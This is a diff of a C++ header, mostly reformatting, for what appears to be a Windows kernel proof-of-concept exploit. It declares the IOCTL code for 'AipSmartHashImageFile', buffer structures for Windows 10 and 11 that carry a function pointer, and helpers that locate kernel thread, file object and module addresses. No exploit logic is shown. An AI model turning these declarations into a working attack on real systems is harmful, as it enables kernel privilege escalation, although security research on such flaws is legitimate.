| 1 | 1 | | #pragma once |
| 2 | 2 | | |
| 3 | | - | typedef struct _CFG_FUNCTION_WRAPPER |
| 4 | | - | { |
| 5 | | - | PVOID FunctionPointer; |
| 6 | | - | } CFG_FUNCTION_WRAPPER, * PCFG_FUNCTION_WRAPPER; |
| | 3 | + | typedef struct _CFG_FUNCTION_WRAPPER { |
| | 4 | + | PVOID FunctionPointer; |
| | 5 | + | } CFG_FUNCTION_WRAPPER, *PCFG_FUNCTION_WRAPPER; |
| 7 | 6 | | |
| 8 | | - | typedef struct _USER_BUFFER_W10 |
| 9 | | - | { |
| 10 | | - | UINT64 FirstArg; // 8 bytes - Reserved or used as needed |
| 11 | | - | PVOID Value; // 8 bytes - Should be 0 according to the requirement |
| 12 | | - | PCFG_FUNCTION_WRAPPER PtrToFunctionWrapper; // 8 bytes - Points to CFG_FUNCTION_WRAPPER |
| 13 | | - | } AIP_SMART_HASH_IMAGE_FILE_W10, * PUSER_BUFFER_W10; |
| | 7 | + | typedef struct _AIP_SMART_HASH_IMAGE_FILE_W10 { |
| | 8 | + | UINT64 FirstArg; // 8 bytes - Reserved or used as needed |
| | 9 | + | PVOID Value; // 8 bytes - Should be 0 according to the requirement |
| | 10 | + | PCFG_FUNCTION_WRAPPER |
| | 11 | + | PtrToFunctionWrapper; // 8 bytes - Points to CFG_FUNCTION_WRAPPER |
| | 12 | + | } AIP_SMART_HASH_IMAGE_FILE_W10, *PAIP_SMART_HASH_IMAGE_FILE_W10; |
| 14 | 13 | | |
| 15 | | - | typedef struct _USER_BUFFER_W11 |
| 16 | | - | { |
| 17 | | - | UINT64 FirstArg; // 8 bytes - Reserved or used as needed |
| 18 | | - | PVOID Value; // 8 bytes - Should be 0 according to the requirement |
| 19 | | - | PCFG_FUNCTION_WRAPPER PtrToFunctionWrapper; // 8 bytes - Points to CFG_FUNCTION_WRAPPER |
| 20 | | - | PVOID Unknown; // 8 bytes - Reserved or used as needed |
| 21 | | - | } AIP_SMART_HASH_IMAGE_FILE_W11, * PUSER_BUFFER_W11; |
| | 14 | + | typedef struct _AIP_SMART_HASH_IMAGE_FILE_W11 { |
| | 15 | + | UINT64 FirstArg; // 8 bytes - Reserved or used as needed |
| | 16 | + | PVOID Value; // 8 bytes - Should be 0 according to the requirement |
| | 17 | + | PCFG_FUNCTION_WRAPPER |
| | 18 | + | PtrToFunctionWrapper; // 8 bytes - Points to CFG_FUNCTION_WRAPPER |
| | 19 | + | PVOID Unknown; // 8 bytes - Reserved or used as needed |
| | 20 | + | } AIP_SMART_HASH_IMAGE_FILE_W11, *PAIP_SMART_HASH_IMAGE_FILE_W11; |
| 22 | 21 | | |
| 23 | 22 | | typedef struct SYSTEM_MODULE { |
| 24 | | - | ULONG Reserved1; |
| 25 | | - | ULONG Reserved2; |
| | 23 | + | ULONG Reserved1; |
| | 24 | + | ULONG Reserved2; |
| 26 | 25 | | #ifdef _WIN64 |
| 27 | | - | ULONG Reserved3; |
| | 26 | + | ULONG Reserved3; |
| 28 | 27 | | #endif |
| 29 | | - | PVOID ImageBaseAddress; |
| 30 | | - | ULONG ImageSize; |
| 31 | | - | ULONG Flags; |
| 32 | | - | WORD Id; |
| 33 | | - | WORD Rank; |
| 34 | | - | WORD w018; |
| 35 | | - | WORD NameOffset; |
| 36 | | - | CHAR Name[255]; |
| 37 | | - | }SYSTEM_MODULE, * PSYSTEM_MODULE; |
| | 28 | + | PVOID ImageBaseAddress; |
| | 29 | + | ULONG ImageSize; |
| | 30 | + | ULONG Flags; |
| | 31 | + | WORD Id; |
| | 32 | + | WORD Rank; |
| | 33 | + | WORD w018; |
| | 34 | + | WORD NameOffset; |
| | 35 | + | CHAR Name[255]; |
| | 36 | + | } SYSTEM_MODULE, *PSYSTEM_MODULE; |
| 38 | 37 | | |
| 39 | 38 | | typedef struct SYSTEM_MODULE_INFORMATION { |
| 40 | | - | ULONG ModulesCount; |
| 41 | | - | SYSTEM_MODULE Modules[1]; |
| 42 | | - | } SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION; |
| | 39 | + | ULONG ModulesCount; |
| | 40 | + | SYSTEM_MODULE Modules[1]; |
| | 41 | + | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; |
| 43 | 42 | | |
| 44 | | - | class c_poc |
| 45 | | - | { |
| | 43 | + | class c_poc { |
| 46 | 44 | | private: |
| 47 | | - | static constexpr uintptr_t IOCTL_AipSmartHashImageFile = 0x22A018; |
| | 45 | + | static constexpr uintptr_t IOCTL_AipSmartHashImageFile = 0x22A018; |
| 48 | 46 | | |
| 49 | | - | |
| 50 | | - | void* set_ioctl_buffer(size_t* kthreadoffset, OSVERSIONINFOEXW* osInfo); |
| | 47 | + | void *set_ioctl_buffer(size_t *k_thread_offset, OSVERSIONINFOEXW *os_info); |
| 51 | 48 | | |
| 52 | | - | UINT_PTR get_ethread_address(); |
| 53 | | - | UINT_PTR get_file_object_address(); |
| 54 | | - | UINT_PTR get_kernel_module_address(const char* TargetModule); |
| 55 | | - | BOOL scan_section_for_pattern(HANDLE hProcess, LPVOID lpBaseAddress, SIZE_T dwSize, BYTE* pattern, SIZE_T patternSize, LPVOID* lpFoundAddress); |
| 56 | | - | UINT_PTR find_pattern(HMODULE hModule); |
| | 49 | + | UINT_PTR get_ethread_address(); |
| | 50 | + | UINT_PTR get_file_object_address(); |
| | 51 | + | UINT_PTR get_kernel_module_address(const char *TargetModule); |
| | 52 | + | BOOL scan_section_for_pattern(HANDLE h_process, LPVOID lp_base_address, |
| | 53 | + | SIZE_T dw_size, BYTE *pattern, |
| | 54 | + | SIZE_T pattern_size, LPVOID *lp_found_address); |
| | 55 | + | UINT_PTR find_pattern(HMODULE h_module); |
| 57 | 56 | | |
| 58 | | - | bool send_ioctl_request(HANDLE hDevice, PVOID inputbuffer, size_t inputbufferLen); |
| | 57 | + | bool send_ioctl_request(HANDLE h_device, PVOID input_buffer, |
| | 58 | + | size_t input_buffer_length); |
| 59 | 59 | | |
| 60 | 60 | | public: |
| 61 | | - | c_poc() = default; |
| 62 | | - | ~c_poc() = default; |
| | 61 | + | c_poc() = default; |
| | 62 | + | ~c_poc() = default; |
| 63 | 63 | | |
| 64 | | - | bool act(); |
| | 64 | + | bool act(); |
| 65 | 65 | | }; |
| 66 | 66 | | |
| 67 | 67 | | inline auto poc = std::make_unique<c_poc>(); |
| | 68 | + | |
